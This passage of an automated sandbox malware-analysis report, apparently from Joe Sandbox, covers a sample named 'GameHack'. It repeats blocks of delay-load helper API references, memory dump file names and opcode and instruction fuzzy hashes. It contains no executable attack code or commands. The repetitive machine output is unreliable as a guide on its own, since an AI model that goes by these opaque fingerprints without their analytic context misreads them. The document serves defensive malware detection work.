                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 7086e672695fc65ca4d6252d6cac4d7bdc70bbcaf75661a5a28bfa6cbd07c178
                                      • Instruction ID: f05ed20e9451d198ef9dca0d7f76df0eaba72c04533f4ae7e830d9603ff56efa
                                      • Opcode Fuzzy Hash: 7086e672695fc65ca4d6252d6cac4d7bdc70bbcaf75661a5a28bfa6cbd07c178
                                      • Instruction Fuzzy Hash: 2FB012A136D4466C314CB1066D16D36024CC5C1B20330D01AB40DF02C1D4409C0E7432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 58b7b342e34d0fdbfce6dcf1690795fba1048738901ba5f3fd1af812914ae445
                                      • Instruction ID: 1423517925eca8c306e37b56698f669be3cbebcbacde6bcdcb91092ec79288af
                                      • Opcode Fuzzy Hash: 58b7b342e34d0fdbfce6dcf1690795fba1048738901ba5f3fd1af812914ae445
                                      • Instruction Fuzzy Hash: 5CB012A536D7467C314C71027D66C3B020CD5C0B20330552AB40DF00C1D4809C49B432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEE20B
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 36e8a1a06ebddddd59924251c38c6ea2c64ce982c9aa9b33c40d4d1147b81524
                                      • Instruction ID: b29ea28365fb08c01a6351a1bd81aa911fe0fb9044426865fc0802c01a94c2db
                                      • Opcode Fuzzy Hash: 36e8a1a06ebddddd59924251c38c6ea2c64ce982c9aa9b33c40d4d1147b81524
                                      • Instruction Fuzzy Hash: 99B012E136E0457C320C5102BD06C76031CC4C0B60330D01AF305F41C19580DC09B033
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: f9607761bdd166c11a10ba68093e2fe773c32296e6190b445b1e058f66b73d84
                                      • Instruction ID: 03eb42e87939d05c126cdd7f063d71b7b4d843d943327ee6d98af7a612ee60cf
                                      • Opcode Fuzzy Hash: f9607761bdd166c11a10ba68093e2fe773c32296e6190b445b1e058f66b73d84
                                      • Instruction Fuzzy Hash: 23B012B136D5466C314CB1066E16D3602CCC5C0B20730501AB00DF01C1D6409C067432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: efba1ed4a2e6b784ac65fb95f67f48a1bbe20df53f1c8554f78c69b48deebd8f
                                      • Instruction ID: 5bd29ef65574384d80da3cb3b55f28797de7d4658f2b04f218b275ba54a91926
                                      • Opcode Fuzzy Hash: efba1ed4a2e6b784ac65fb95f67f48a1bbe20df53f1c8554f78c69b48deebd8f
                                      • Instruction Fuzzy Hash: 1BB012A136D5466C314CB1166D16D36028CC5C1B20330901AB50DF01C1D6409C057432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 906929093986084c63e317baf4e52fc58fcc0af0e546d3441aa076b9443ee24d
                                      • Instruction ID: 452cada14be7aa6450deb9cce0cb17f011b366da80868498af41291fd1d725ac
                                      • Opcode Fuzzy Hash: 906929093986084c63e317baf4e52fc58fcc0af0e546d3441aa076b9443ee24d
                                      • Instruction Fuzzy Hash: 96B012A137E4466C314CB1066D56D36028DD9C0B20730501AB14DF01C1D4409C057432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: da0db7d89331f0bfc14e23d4622e58db486ecda467506e9eadf1c5a6719b393c
                                      • Instruction ID: 42d93dac8ac4e19ccc879507572d686fcfea2fd825fa266ead5a41a8eb92ce15
                                      • Opcode Fuzzy Hash: da0db7d89331f0bfc14e23d4622e58db486ecda467506e9eadf1c5a6719b393c
                                      • Instruction Fuzzy Hash: 11B012A136E4466C314CB1066D56D36024DC5C1B20730901AB50DF01C1D4409C057432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 813fe96759f991c1a1a620e8b8a60e57a98b8fe34c03c065b395c95663af23b8
                                      • Instruction ID: bb5b27f91a7e3c35619e4af8917cad20e4a503cad4efc40731b24ed52860baae
                                      • Opcode Fuzzy Hash: 813fe96759f991c1a1a620e8b8a60e57a98b8fe34c03c065b395c95663af23b8
                                      • Instruction Fuzzy Hash: 92B012B136E5466C318CB2067D56D36024DC5C0B20730511AB10DF01C1D4809C457432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 9cd24b94ed1e9eea5f41261a005cb6c65648c2823bf49ac50607bfa29e58a3eb
                                      • Instruction ID: acb4a77f53e66d6a03c60271e535c40fbe19814277962bdb61d19802e63435e9
                                      • Opcode Fuzzy Hash: 9cd24b94ed1e9eea5f41261a005cb6c65648c2823bf49ac50607bfa29e58a3eb
                                      • Instruction Fuzzy Hash: 78B012F136D045AC314CB1076C02D7A028CC0C0B20330D12BF40DE0185D4448D08B832
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                       • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                       • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cd8efdfdbdb0095263946d183d090bde3835b7d389a7219328447b7325fc3a8f
                                      • Instruction ID: c7f5ce07f0d978cf19a41bad486832ff98957f7eb656e3904c0a6dbbd4d623df
                                      • Opcode Fuzzy Hash: cd8efdfdbdb0095263946d183d090bde3835b7d389a7219328447b7325fc3a8f
                                      • Instruction Fuzzy Hash: E0B012E136D0456C314CB1076D02E7E028DD0C4B20330952BF00DE0185D4408C0DB432
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 08bb128b9c10ee79eab660da1f0ef247f955e11371bfe4a4aeba4f597a99d14a
                                      • Instruction ID: 22c4dcdea2e403c679ef372db42fc2086a984a25cc05d615c2df8e2479aea511
                                      • Opcode Fuzzy Hash: 08bb128b9c10ee79eab660da1f0ef247f955e11371bfe4a4aeba4f597a99d14a
                                      • Instruction Fuzzy Hash: AEB012E537C04BAC314C92066C07E7702ACD0C0B20330A01AF409F11C1EA408C0CB032
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 4b25e4dde1e6e724335423d5dc0750d26de26dc21e1c2e1df82786079be4f8c3
                                      • Instruction ID: 0432a145acd6af0ded2ff3e397e6cd009921e3090184455f26fbee8ee2d66e23
                                      • Opcode Fuzzy Hash: 4b25e4dde1e6e724335423d5dc0750d26de26dc21e1c2e1df82786079be4f8c3
                                      • Instruction Fuzzy Hash: C8B012E537C08B6C314C92066D07E77025CD0C0B20330A01AF109F01C1EA408C09B032
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 55c76b4888d4f95a2273c0d94346c41c0ab7c60f805a59e7f1950b6b66c416a3
                                      • Instruction ID: 7110c4349d7782c4d75016b0f86e60135d7a46c23187489e778ea74ca2ac08eb
                                      • Opcode Fuzzy Hash: 55c76b4888d4f95a2273c0d94346c41c0ab7c60f805a59e7f1950b6b66c416a3
                                      • Instruction Fuzzy Hash: EDB012E537C14F7C324C52027C07D77021CD0C0B20330612AF005F00C1EA408C4CB032
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 0d4dc8f92b8edc433b6b16c36a277e0a1ca964604d7bf53b40ab369b3d0decdd
                                      • Instruction ID: 1d4b5f6f2c97b3d3a47392c8a774127ad5762c8fa56790f69da47106925bc8e4
                                      • Opcode Fuzzy Hash: 0d4dc8f92b8edc433b6b16c36a277e0a1ca964604d7bf53b40ab369b3d0decdd
                                      • Instruction Fuzzy Hash: 02B012E537C04AAC314C92166D07F76025CE0C0B20330602AF00AF01C1EA408C0CB032
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cc06a96339f1fa0e1b5dc7a10f3ffdfa395100ac8bc4623087febce7bf9fa038
                                      • Instruction ID: f00d59d9fc19f3d4b023676653e3133dc22bcc9d325955e07b374e13031bce97
                                      • Opcode Fuzzy Hash: cc06a96339f1fa0e1b5dc7a10f3ffdfa395100ac8bc4623087febce7bf9fa038
                                      • Instruction Fuzzy Hash: 2FB012E13AD1496C714CB1076D02E7A028DF0C0B20330512BF00DE0185D5408C08B532
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDC36
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmp
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 78b89c05f7188f38aacee93c4c4de3d0e8a5e659b92a34d56d324123d3813338
                                      • Instruction ID: 88d39b7be6767d534a951f2061ba1f9303f65ada380e3ac0a054564a93d6d305
                                      • Opcode Fuzzy Hash: 78b89c05f7188f38aacee93c4c4de3d0e8a5e659b92a34d56d324123d3813338
                                      • Instruction Fuzzy Hash: D5B012A537C6456C714CB10AAD02D7E026CD1C0B60330551BF109F02C2D580DC04B032
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDC36
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmp
